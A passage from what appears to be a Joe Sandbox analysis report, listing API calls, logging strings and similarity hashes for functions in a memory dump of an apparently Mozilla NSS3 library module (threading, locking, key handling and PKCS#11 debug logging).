                                                                          • Part of subcall function 6CB007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA9204A), ref: 6CB007AD
                                                                          • Part of subcall function 6CB007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA9204A), ref: 6CB007CD
                                                                          • Part of subcall function 6CB007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA9204A), ref: 6CB007D6
                                                                          • Part of subcall function 6CB007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA9204A), ref: 6CB007E4
                                                                          • Part of subcall function 6CB007A0: TlsSetValue.KERNEL32(00000000,?,6CA9204A), ref: 6CB00864
                                                                          • Part of subcall function 6CB007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB00880
                                                                          • Part of subcall function 6CB007A0: TlsSetValue.KERNEL32(00000000,?,?,6CA9204A), ref: 6CB008CB
                                                                          • Part of subcall function 6CB007A0: TlsGetValue.KERNEL32(?,?,6CA9204A), ref: 6CB008D7
                                                                          • Part of subcall function 6CB007A0: TlsGetValue.KERNEL32(?,?,6CA9204A), ref: 6CB008FB
                                                                        • TlsGetValue.KERNEL32 ref: 6CB54DD7
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6CB54DEC
                                                                        • PR_Unlock.NSS3(?), ref: 6CB54E1B
                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6CB54E2F
                                                                        • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB54E5A
                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6CB54E71
                                                                        • free.MOZGLUE(00000000), ref: 6CB54E7A
                                                                        • PR_Unlock.NSS3(?), ref: 6CB54EA2
                                                                        • TlsGetValue.KERNEL32 ref: 6CB54EC1
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6CB54ED6
                                                                        • PR_Unlock.NSS3(?), ref: 6CB54F01
                                                                        • free.MOZGLUE(00000000), ref: 6CB54F2A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                        • String ID:
                                                                        • API String ID: 759471828-0
                                                                        • Opcode ID: 6e4fb2a0a637a6cbe7566dc827ddda270e15c974d51e3982e8198bbdef86d1d0
                                                                        • Instruction ID: bfec7337e7514a38bc0a7190a1d0259d98c3a03dd063235a99f7c663d4a23fbc
                                                                        • Opcode Fuzzy Hash: 6e4fb2a0a637a6cbe7566dc827ddda270e15c974d51e3982e8198bbdef86d1d0
                                                                        • Instruction Fuzzy Hash: 01B10171A002459FDF01EF29D844AAA77B4FF49318F844128EC1997B51EB34E975CFA2
                                                                        Function 6CB25DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB25DEC
                                                                        • PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6CB25E0F
                                                                        • PORT_ZAlloc_Util.NSS3(00000828), ref: 6CB25E35
                                                                        • SECKEY_CopyPublicKey.NSS3(?), ref: 6CB25E6A
                                                                        • HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6CB25EC3
                                                                        • NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6CB25ED9
                                                                        • SECKEY_SignatureLen.NSS3(?), ref: 6CB25F09
                                                                        • PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6CB25F49
                                                                        • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CB25F89
                                                                        • free.MOZGLUE(?), ref: 6CB25FA0
                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB25FB6
                                                                        • free.MOZGLUE(00000000), ref: 6CB25FBF
                                                                        • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB2600C
                                                                        • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB26079
                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB26084
                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB26094
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
                                                                        • String ID:
                                                                        • API String ID: 2310191401-3916222277
                                                                        • Opcode ID: 35c58a674d3fcf9f84e04e14c8311a371e47326088f4ceee06656999b485d939
                                                                        • Instruction ID: 5297245153dd208159198506b76bb361d03054e9559914b8ad30eb6d3bb16d76
                                                                        • Opcode Fuzzy Hash: 35c58a674d3fcf9f84e04e14c8311a371e47326088f4ceee06656999b485d939
                                                                        • Instruction Fuzzy Hash: EB81E5B1E002859BDF10CA64CC81BBE77B5EF44318F144128E91DE7795E739E818CBA6
                                                                        Function 6CB46D60 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_LogPrint.NSS3(C_Digest), ref: 6CB46D86
                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB46DB4
                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB46DC3
                                                                          • Part of subcall function 6CC2D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC2D963
                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6CB46DD9
                                                                        • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CB46DFA
                                                                        • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CB46E13
                                                                        • PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6CB46E2C
                                                                        • PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6CB46E47
                                                                        • PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6CB46EB9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                        • String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
                                                                        • API String ID: 1003633598-2270781106
                                                                        • Opcode ID: 3a47b1d34348ba98c66ad42fdcad39c8e67675e42f21f72ba95306fae61c47ab
                                                                        • Instruction ID: b9af72a2fb66b652091272b98ac87f2814cc3f7e633aa53b5a7a1d9fd4bbe7eb
                                                                        • Opcode Fuzzy Hash: 3a47b1d34348ba98c66ad42fdcad39c8e67675e42f21f72ba95306fae61c47ab
                                                                        • Instruction Fuzzy Hash: C441B2756011A4EFDB01EF55DD59F8A3BB1EB42319F048025E809D7A16EB31DC48DBB2
                                                                        Function 6CB49C40 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 118COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_LogPrint.NSS3(C_LoginUser), ref: 6CB49C66
                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB49C94
                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB49CA3
                                                                          • Part of subcall function 6CC2D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC2D963
                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6CB49CB9
                                                                        • PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6CB49CDA
                                                                        • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CB49CF5
                                                                        • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CB49D10
                                                                        • PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6CB49D29
                                                                        • PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6CB49D42
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                        • String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser
                                                                        • API String ID: 1003633598-3838449515
                                                                        • Opcode ID: a18b946981c6a387e364b5629b248a7ea639ab3534d0228398e93870acc1ffd7
                                                                        • Instruction ID: 836e47991d050829643274c879a14ba3de2f2e8f859f2b7f8197c4ba62083996
                                                                        • Opcode Fuzzy Hash: a18b946981c6a387e364b5629b248a7ea639ab3534d0228398e93870acc1ffd7
                                                                        • Instruction Fuzzy Hash: 2841B675A011A4EFDB01EF54DE58E8D3BB9FB4231AF448025E509A7612EB319818EBB1
                                                                        Function 6CC29C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • calloc.MOZGLUE(00000001,00000080), ref: 6CC29C70
                                                                        • PR_NewLock.NSS3 ref: 6CC29C85
                                                                          • Part of subcall function 6CBD98D0: calloc.MOZGLUE(00000001,00000084,6CB00936,00000001,?,6CB0102C), ref: 6CBD98E5
                                                                        • PR_NewCondVar.NSS3(00000000), ref: 6CC29C96
                                                                          • Part of subcall function 6CAFBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CB021BC), ref: 6CAFBB8C
                                                                        • PR_NewLock.NSS3 ref: 6CC29CA9
                                                                          • Part of subcall function 6CBD98D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6CBD9946
                                                                          • Part of subcall function 6CBD98D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA916B7,00000000), ref: 6CBD994E
                                                                          • Part of subcall function 6CBD98D0: free.MOZGLUE(00000000), ref: 6CBD995E
                                                                        • PR_NewLock.NSS3 ref: 6CC29CB9
                                                                        • PR_NewLock.NSS3 ref: 6CC29CC9
                                                                        • PR_NewCondVar.NSS3(00000000), ref: 6CC29CDA
                                                                          • Part of subcall function 6CAFBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CAFBBEB
                                                                          • Part of subcall function 6CAFBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CAFBBFB
                                                                          • Part of subcall function 6CAFBB80: GetLastError.KERNEL32 ref: 6CAFBC03
                                                                          • Part of subcall function 6CAFBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CAFBC19
                                                                          • Part of subcall function 6CAFBB80: free.MOZGLUE(00000000), ref: 6CAFBC22
                                                                        • PR_NewCondVar.NSS3(?), ref: 6CC29CF0
                                                                        • PR_NewPollableEvent.NSS3 ref: 6CC29D03
                                                                          • Part of subcall function 6CC1F3B0: PR_CallOnce.NSS3(6CC714B0,6CC1F510), ref: 6CC1F3E6
                                                                          • Part of subcall function 6CC1F3B0: PR_CreateIOLayerStub.NSS3(6CC7006C), ref: 6CC1F402
                                                                          • Part of subcall function 6CC1F3B0: PR_Malloc.NSS3(00000004), ref: 6CC1F416
                                                                          • Part of subcall function 6CC1F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6CC1F42D
                                                                          • Part of subcall function 6CC1F3B0: PR_SetSocketOption.NSS3(?), ref: 6CC1F455
                                                                          • Part of subcall function 6CC1F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6CC1F473
                                                                          • Part of subcall function 6CBD9890: TlsGetValue.KERNEL32(?,?,?,6CBD97EB), ref: 6CBD989E
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6CC29D78
                                                                        • calloc.MOZGLUE(00000001,0000000C), ref: 6CC29DAF
                                                                        • _PR_CreateThread.NSS3(00000000,6CC29EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6CC29D9F
                                                                          • Part of subcall function 6CAFB3C0: TlsGetValue.KERNEL32 ref: 6CAFB403
                                                                          • Part of subcall function 6CAFB3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6CAFB459
                                                                        • _PR_CreateThread.NSS3(00000000,6CC2A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6CC29DE8
                                                                        • calloc.MOZGLUE(00000001,0000000C), ref: 6CC29DFC
                                                                        • _PR_CreateThread.NSS3(00000000,6CC2A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6CC29E29
                                                                        • calloc.MOZGLUE(00000001,0000000C), ref: 6CC29E3D
                                                                        • _PR_MD_UNLOCK.NSS3(?), ref: 6CC29E71
                                                                        • PR_SetError.NSS3(FFFFE890,00000000), ref: 6CC29E89
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
                                                                        • String ID:
                                                                        • API String ID: 4254102231-0
                                                                        • Opcode ID: dc74945b82a8769cf018a63f159b1a79590750ecdaff16bf92a59269d5954535
                                                                        • Instruction ID: f0738fccae36a30b3bda9b746291f97189f4516b7253530413b712b5d05e9279
                                                                        • Opcode Fuzzy Hash: dc74945b82a8769cf018a63f159b1a79590750ecdaff16bf92a59269d5954535
                                                                        • Instruction Fuzzy Hash: F9615EB1900746AFD710DF75D844AABBBF8FF08208B044529E859C7B11FB74E455CBA1
                                                                        Function 6CB44CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6CB44CF3
                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB44D28
                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB44D37
                                                                          • Part of subcall function 6CC2D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC2D963
                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6CB44D4D
                                                                        • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CB44D7B
                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB44D8A
                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6CB44DA0
                                                                        • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6CB44DBC
                                                                        • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6CB44E20
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                        • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
                                                                        • API String ID: 1003633598-3553622718
                                                                        • Opcode ID: eb960c63c5ef5b244be09870c22b5e71c66a270a92678a58d12b48e6732e1793
                                                                        • Instruction ID: 0f7fd109dbd8e94678fd6b0c08baf34a03189618654a8d26c51b721ab90a0832
                                                                        • Opcode Fuzzy Hash: eb960c63c5ef5b244be09870c22b5e71c66a270a92678a58d12b48e6732e1793
                                                                        • Instruction Fuzzy Hash: 2F41F671604160EFDB019F14DD98FAE3775EB4231DF04C025E408ABA16EB349C58EF62
                                                                        Function 6CB47C90 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_LogPrint.NSS3(C_Verify), ref: 6CB47CB6
                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB47CE4
                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB47CF3
                                                                          • Part of subcall function 6CC2D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC2D963
                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6CB47D09
                                                                        • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CB47D2A
                                                                        • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CB47D45
                                                                        • PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6CB47D5E
                                                                        • PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6CB47D77
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                        • String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify
                                                                        • API String ID: 1003633598-3278097884
                                                                        • Opcode ID: 07ab415c635a163f9ddd1e8bd80a344e3ed5decb6a6ad9e8894288b76b1b5f4e
                                                                        • Instruction ID: 899a87fbe96edb1363745a6c7e404aa17e685e13e724881c6414380b5324e8ee
                                                                        • Opcode Fuzzy Hash: 07ab415c635a163f9ddd1e8bd80a344e3ed5decb6a6ad9e8894288b76b1b5f4e
                                                                        • Instruction Fuzzy Hash: 4D31C8756011A5EFDB01DF54DD58FAE37B1EB4231DF088025E409A7612EB319849DBB2
                                                                        Function 6CBDCD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CBDCC7B), ref: 6CBDCD7A
                                                                          • Part of subcall function 6CBDCE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CB4C1A8,?), ref: 6CBDCE92
                                                                        • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CBDCDA5
                                                                        • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CBDCDB8
                                                                        • PR_UnloadLibrary.NSS3(00000000), ref: 6CBDCDDB
                                                                        • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CBDCD8E
                                                                          • Part of subcall function 6CB005C0: PR_EnterMonitor.NSS3 ref: 6CB005D1
                                                                          • Part of subcall function 6CB005C0: PR_ExitMonitor.NSS3 ref: 6CB005EA
                                                                        • PR_LoadLibrary.NSS3(wship6.dll), ref: 6CBDCDE8
                                                                        • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CBDCDFF
                                                                        • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CBDCE16
                                                                        • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CBDCE29
                                                                        • PR_UnloadLibrary.NSS3(00000000), ref: 6CBDCE48
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                        • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                        • API String ID: 601260978-871931242
                                                                        • Opcode ID: e4d7589576eb4cce9b3cf8d3c98fc41327803c5cd0e6385dfd8813202a1509d3
                                                                        • Instruction ID: 8997cde67983f1dbac82c44d096bfa298a2db3ce7eac6d498feb18f36faae608
                                                                        • Opcode Fuzzy Hash: e4d7589576eb4cce9b3cf8d3c98fc41327803c5cd0e6385dfd8813202a1509d3
                                                                        • Instruction Fuzzy Hash: BF11A2F5E126B257DB026E796C2199E2E6CEB1214CB198534D809D2E41FB20E90887B2
                                                                        Function 6CC21C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6CC213BC,?,?,?,6CC21193), ref: 6CC21C6B
                                                                        • PR_NewLock.NSS3(?,6CC21193), ref: 6CC21C7E
                                                                          • Part of subcall function 6CBD98D0: calloc.MOZGLUE(00000001,00000084,6CB00936,00000001,?,6CB0102C), ref: 6CBD98E5
                                                                        • PR_NewCondVar.NSS3(00000000,?,6CC21193), ref: 6CC21C91
                                                                          • Part of subcall function 6CAFBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CB021BC), ref: 6CAFBB8C
                                                                        • PR_NewCondVar.NSS3(00000000,?,?,6CC21193), ref: 6CC21CA7
                                                                          • Part of subcall function 6CAFBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CAFBBEB
                                                                          • Part of subcall function 6CAFBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CAFBBFB
                                                                          • Part of subcall function 6CAFBB80: GetLastError.KERNEL32 ref: 6CAFBC03
                                                                          • Part of subcall function 6CAFBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CAFBC19
                                                                          • Part of subcall function 6CAFBB80: free.MOZGLUE(00000000), ref: 6CAFBC22
                                                                        • PR_NewCondVar.NSS3(00000000,?,?,?,6CC21193), ref: 6CC21CBE
                                                                        • PR_NewCondVar.NSS3(00000000,?,?,?,?,6CC21193), ref: 6CC21CD4
                                                                        • calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6CC21193), ref: 6CC21CFE
                                                                        • PR_Lock.NSS3(?,?,?,?,?,?,?,6CC21193), ref: 6CC21D1A
                                                                          • Part of subcall function 6CBD9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CB01A48), ref: 6CBD9BB3
                                                                          • Part of subcall function 6CBD9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CB01A48), ref: 6CBD9BC8
                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6CC21193), ref: 6CC21D3D
                                                                          • Part of subcall function 6CBBDD70: TlsGetValue.KERNEL32 ref: 6CBBDD8C
                                                                          • Part of subcall function 6CBBDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CBBDDB4
                                                                        • PR_SetError.NSS3(FFFFE890,00000000,?,6CC21193), ref: 6CC21D4E
                                                                        • PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6CC21193), ref: 6CC21D64
                                                                        • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6CC21193), ref: 6CC21D6F
